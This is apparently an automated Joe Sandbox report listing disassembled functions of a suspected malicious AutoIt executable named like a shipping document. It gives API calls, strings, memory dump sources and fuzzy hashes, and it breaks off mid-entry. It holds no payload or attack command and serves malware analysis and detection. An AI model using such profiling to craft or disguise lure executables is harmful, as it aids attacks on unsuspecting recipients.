                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 009B4AF6
                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009B4B09
                                                                • IsWindowVisible.USER32(?), ref: 009B4B29
                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 009B4B44
                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 009B4B58
                                                                • GetWindowRect.USER32(?,?), ref: 009B4B70
                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 009B4B96
                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 009B4BB0
                                                                • CopyRect.USER32(?,?), ref: 009B4BC7
                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 009B4C32
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                • String ID: ($0$tooltips_class32
                                                                • API String ID: 698492251-4156429822
                                                                • Opcode ID: e8defb38d69bcb5ae388cd04bec5a254688d4b3e07f58f96cbd6dbc4ba508c01
                                                                • Instruction ID: a339ca6f1fca5f20fe9ecd9f4bdff681c689c332d8948ac412cd566b44a99cd6
                                                                • Opcode Fuzzy Hash: e8defb38d69bcb5ae388cd04bec5a254688d4b3e07f58f96cbd6dbc4ba508c01
                                                                • Instruction Fuzzy Hash: AEB18C71608340AFDB04DF64C984BAABBE4BF84720F008A1DF9999B292D771EC05DF55
                                                                Function 009327D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009328BC
                                                                • GetSystemMetrics.USER32(00000007), ref: 009328C4
                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009328EF
                                                                • GetSystemMetrics.USER32(00000008), ref: 009328F7
                                                                • GetSystemMetrics.USER32(00000004), ref: 0093291C
                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00932939
                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00932949
                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0093297C
                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00932990
                                                                • GetClientRect.USER32(00000000,000000FF), ref: 009329AE
                                                                • GetStockObject.GDI32(00000011), ref: 009329CA
                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 009329D5
                                                                  • Part of subcall function 00932344: GetCursorPos.USER32(?), ref: 00932357
                                                                  • Part of subcall function 00932344: ScreenToClient.USER32(009F57B0,?), ref: 00932374
                                                                  • Part of subcall function 00932344: GetAsyncKeyState.USER32(00000001), ref: 00932399
                                                                  • Part of subcall function 00932344: GetAsyncKeyState.USER32(00000002), ref: 009323A7
                                                                • SetTimer.USER32(00000000,00000000,00000028,00931256), ref: 009329FC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                • String ID: AutoIt v3 GUI
                                                                • API String ID: 1458621304-248962490
                                                                • Opcode ID: 613efaee7f6fd69c3f3beed3422fedc8426c7aea53aa8d2a2fe0faa013129d0b
                                                                • Instruction ID: 2dfe13bbe41ac726b4a8bccb5058a8082224f299a2165cb57c79b3ddafd72c0a
                                                                • Opcode Fuzzy Hash: 613efaee7f6fd69c3f3beed3422fedc8426c7aea53aa8d2a2fe0faa013129d0b
                                                                • Instruction Fuzzy Hash: 6EB15A71A1420AEFDB14DFA8DD55BAE7BB4FB48320F114229FA15E72A0DB74A840DF50
                                                                Function 0098A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0098A47A
                                                                • __swprintf.LIBCMT ref: 0098A51B
                                                                • _wcscmp.LIBCMT ref: 0098A52E
                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0098A583
                                                                • _wcscmp.LIBCMT ref: 0098A5BF
                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0098A5F6
                                                                • GetDlgCtrlID.USER32(?), ref: 0098A648
                                                                • GetWindowRect.USER32(?,?), ref: 0098A67E
                                                                • GetParent.USER32(?), ref: 0098A69C
                                                                • ScreenToClient.USER32(00000000), ref: 0098A6A3
                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0098A71D
                                                                • _wcscmp.LIBCMT ref: 0098A731
                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0098A757
                                                                • _wcscmp.LIBCMT ref: 0098A76B
                                                                  • Part of subcall function 0095362C: _iswctype.LIBCMT ref: 00953634
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                • String ID: %s%u
                                                                • API String ID: 3744389584-679674701
                                                                • Opcode ID: ba1994fee1e0d30dc95fde0266a4651cd41d14b8e686991b21ccfb94625775cf
                                                                • Instruction ID: 20ab8f6fa9890fc9cf7086a9244ebb283add0a69af63daa41fbeba5da7d59df0
                                                                • Opcode Fuzzy Hash: ba1994fee1e0d30dc95fde0266a4651cd41d14b8e686991b21ccfb94625775cf
                                                                • Instruction Fuzzy Hash: 58A1D631604706AFE714EF64C884FAAB7ECFF44354F00862AF999C2250DB34E955CB92
                                                                Function 0098AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 0098AF18
                                                                • _wcscmp.LIBCMT ref: 0098AF29
                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 0098AF51
                                                                • CharUpperBuffW.USER32(?,00000000), ref: 0098AF6E
                                                                • _wcscmp.LIBCMT ref: 0098AF8C
                                                                • _wcsstr.LIBCMT ref: 0098AF9D
                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0098AFD5
                                                                • _wcscmp.LIBCMT ref: 0098AFE5
                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 0098B00C
                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0098B055
                                                                • _wcscmp.LIBCMT ref: 0098B065
                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 0098B08D
                                                                • GetWindowRect.USER32(00000004,?), ref: 0098B0F6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                • String ID: @$ThumbnailClass
                                                                • API String ID: 1788623398-1539354611
                                                                • Opcode ID: c9f8d038a865f7b55d7348b760cd8966ba0d4a780ba346655c90bc258b46b171
                                                                • Instruction ID: 1a6c693f6c1c5b835a068128f8efe23af05c4519afbd289ec630f736888738e4
                                                                • Opcode Fuzzy Hash: c9f8d038a865f7b55d7348b760cd8966ba0d4a780ba346655c90bc258b46b171
                                                                • Instruction Fuzzy Hash: 4081B1711083059FDB05EF10C895FAABBDCEF84354F08856AFD858A296DB34DD49CB61
                                                                Function 0098ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: __wcsnicmp
                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                • API String ID: 1038674560-1810252412
                                                                • Opcode ID: dd1d785c24eab19f229dca123bf9f80edaa4c02f0788ef5fc1bb438942ef9a57
                                                                • Instruction ID: 174492284c5d1123fe1ca886af6aeea3769d13968d16413f6256de53b9fb6861
                                                                • Opcode Fuzzy Hash: dd1d785c24eab19f229dca123bf9f80edaa4c02f0788ef5fc1bb438942ef9a57
                                                                • Instruction Fuzzy Hash: 6A31A271948209ABEA15FAA1DE03FAEF7B8AF90755F60042AF841711D1EF516F08CB53
                                                                Function 009A4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 009A5013
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 009A501E
                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 009A5029
                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 009A5034
                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 009A503F
                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 009A504A
                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 009A5055
                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 009A5060
                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 009A506B
                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 009A5076
                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 009A5081
                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 009A508C
                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 009A5097
                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 009A50A2
                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 009A50AD
                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 009A50B8
                                                                • GetCursorInfo.USER32(?), ref: 009A50C8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Cursor$Load$Info
                                                                • String ID:
                                                                • API String ID: 2577412497-0
                                                                • Opcode ID: 5ffff57140a71f1cbaee396e1cf21cf23b9b2de00a2b32d5098bf0788eaf32ae
                                                                • Instruction ID: c18efbb7f0026f27c12bda82e5c65a639b987696d978dacd02fadc017ebd5a10
                                                                • Opcode Fuzzy Hash: 5ffff57140a71f1cbaee396e1cf21cf23b9b2de00a2b32d5098bf0788eaf32ae
                                                                • Instruction Fuzzy Hash: 3B31F2B1E483196ADF109FB68C8996EBFE8FF04750F50452AE50DE7280DA78A5008F91
                                                                Function 009BA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 009BA259
                                                                • DestroyWindow.USER32(?,?), ref: 009BA2D3
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 009BA34D
                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 009BA36F
                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009BA382
                                                                • DestroyWindow.USER32(00000000), ref: 009BA3A4
                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00930000,00000000), ref: 009BA3DB
                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009BA3F4
                                                                • GetDesktopWindow.USER32 ref: 009BA40D
                                                                • GetWindowRect.USER32(00000000), ref: 009BA414
                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009BA42C
                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 009BA444
                                                                  • Part of subcall function 009325DB: GetWindowLongW.USER32(?,000000EB), ref: 009325EC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                • String ID: 0$tooltips_class32
                                                                • API String ID: 1297703922-3619404913
                                                                • Opcode ID: fbb668a12a6c1095b14ad3c9437e45afb6d52d79d90e48e9511cdf505854b300
                                                                • Instruction ID: 20b4a8a9a9b0f12f6abd708fb1a568845b655e01935daee353c8253a1f89d362
                                                                • Opcode Fuzzy Hash: fbb668a12a6c1095b14ad3c9437e45afb6d52d79d90e48e9511cdf505854b300
                                                                • Instruction Fuzzy Hash: C871BC70154205AFD721CF28CD49FAA7BEAFB88324F04452DF985872B0DBB0E902DB52
                                                                Function 009BC5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • DragQueryPoint.SHELL32(?,?), ref: 009BC627
                                                                  • Part of subcall function 009BAB37: ClientToScreen.USER32(?,?), ref: 009BAB60
                                                                  • Part of subcall function 009BAB37: GetWindowRect.USER32(?,?), ref: 009BABD6
                                                                  • Part of subcall function 009BAB37: PtInRect.USER32(?,?,009BC014), ref: 009BABE6
                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 009BC690
                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009BC69B
                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009BC6BE
                                                                • _wcscat.LIBCMT ref: 009BC6EE
                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 009BC705
                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 009BC71E
                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 009BC735
                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 009BC757
                                                                • DragFinish.SHELL32(?), ref: 009BC75E
                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 009BC851
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                • API String ID: 169749273-3440237614
                                                                • Opcode ID: 4d2af6e92df25b53b2b22177c5d0045c83a4eb588d80745ce85a32567aa3d652
                                                                • Instruction ID: 0d7e8117ddb21663e77052932719366f2162b90f9efb6f362f31eaa4697a0734
                                                                • Opcode Fuzzy Hash: 4d2af6e92df25b53b2b22177c5d0045c83a4eb588d80745ce85a32567aa3d652
                                                                • Instruction Fuzzy Hash: 20616C71108305AFC701EF64CD85EAFBBE9EFC9764F000A2EF595921A1DB70A949CB52
                                                                Function 009B4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?), ref: 009B4424
                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009B446F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: BuffCharMessageSendUpper
                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                • API String ID: 3974292440-4258414348
                                                                • Opcode ID: 7574da9851a52515112a1e29e9d75d7ce347b42447c7716c30e8f5546d086e37
                                                                • Instruction ID: 9f906da556133beaa73c44daf8f63f7f8746481de2562d0b8a043c4f83d41d69
                                                                • Opcode Fuzzy Hash: 7574da9851a52515112a1e29e9d75d7ce347b42447c7716c30e8f5546d086e37
                                                                • Instruction Fuzzy Hash: 0A9168742047019BCB14EF24C991BAEB7E1AFD5364F048868F8965B3A3CB75ED09DB81
                                                                Function 009BB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009BB8B4
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,009B6B11,?), ref: 009BB910
                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009BB949
                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009BB98C
                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009BB9C3
                                                                • FreeLibrary.KERNEL32(?), ref: 009BB9CF
                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009BB9DF
                                                                • DestroyIcon.USER32(?), ref: 009BB9EE
                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 009BBA0B
                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 009BBA17
                                                                  • Part of subcall function 00952EFD: __wcsicmp_l.LIBCMT ref: 00952F86
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                • String ID: .dll$.exe$.icl
                                                                • API String ID: 1212759294-1154884017
                                                                • Opcode ID: 99a7909576d91459823cb1ba475302d29957372f849d8c7bdcf5ac596774f156
                                                                • Instruction ID: b5908f760ed975b0709103a2963a527f18a328588a58fb80f69e24290564c6de
                                                                • Opcode Fuzzy Hash: 99a7909576d91459823cb1ba475302d29957372f849d8c7bdcf5ac596774f156
                                                                • Instruction Fuzzy Hash: 33610071900209BAEB14DF64CE85FFE7BACEB08725F104619FE15D61C0DBB49984DBA0
                                                                Function 0099DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?), ref: 0099DCDC
                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0099DCEC
                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0099DCF8
                                                                • __wsplitpath.LIBCMT ref: 0099DD56
                                                                • _wcscat.LIBCMT ref: 0099DD6E
                                                                • _wcscat.LIBCMT ref: 0099DD80
                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0099DD95
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0099DDA9
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0099DDDB
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0099DDFC
                                                                • _wcscpy.LIBCMT ref: 0099DE08
                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0099DE47
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                • String ID: *.*
                                                                • API String ID: 3566783562-438819550
                                                                • Opcode ID: b45b0341efcb7016fd86fc6bea64ff946bf3709cf2d15dcb7e3a7f1143944d5b
                                                                • Instruction ID: 5f0229b094322767f49cf8532492e7b5a3e840b8138c3d94531b831d7d1fcea1
                                                                • Opcode Fuzzy Hash: b45b0341efcb7016fd86fc6bea64ff946bf3709cf2d15dcb7e3a7f1143944d5b
                                                                • Instruction Fuzzy Hash: 436159765042059FCB10EF64C884AAEB3E8FFC9314F04492EF99997251EB71EA45CF92
                                                                Function 00999C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00999C7F
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00999CA0
                                                                • __swprintf.LIBCMT ref: 00999CF9
                                                                • __swprintf.LIBCMT ref: 00999D12
                                                                • _wprintf.LIBCMT ref: 00999DB9
                                                                • _wprintf.LIBCMT ref: 00999DD7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: LoadString__swprintf_wprintf$_memmove
                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                • API String ID: 311963372-3080491070
                                                                • Opcode ID: f9a71752771c81c273b77d6d0378f39d904d54d8bfa477ac2274d6be83edfe46
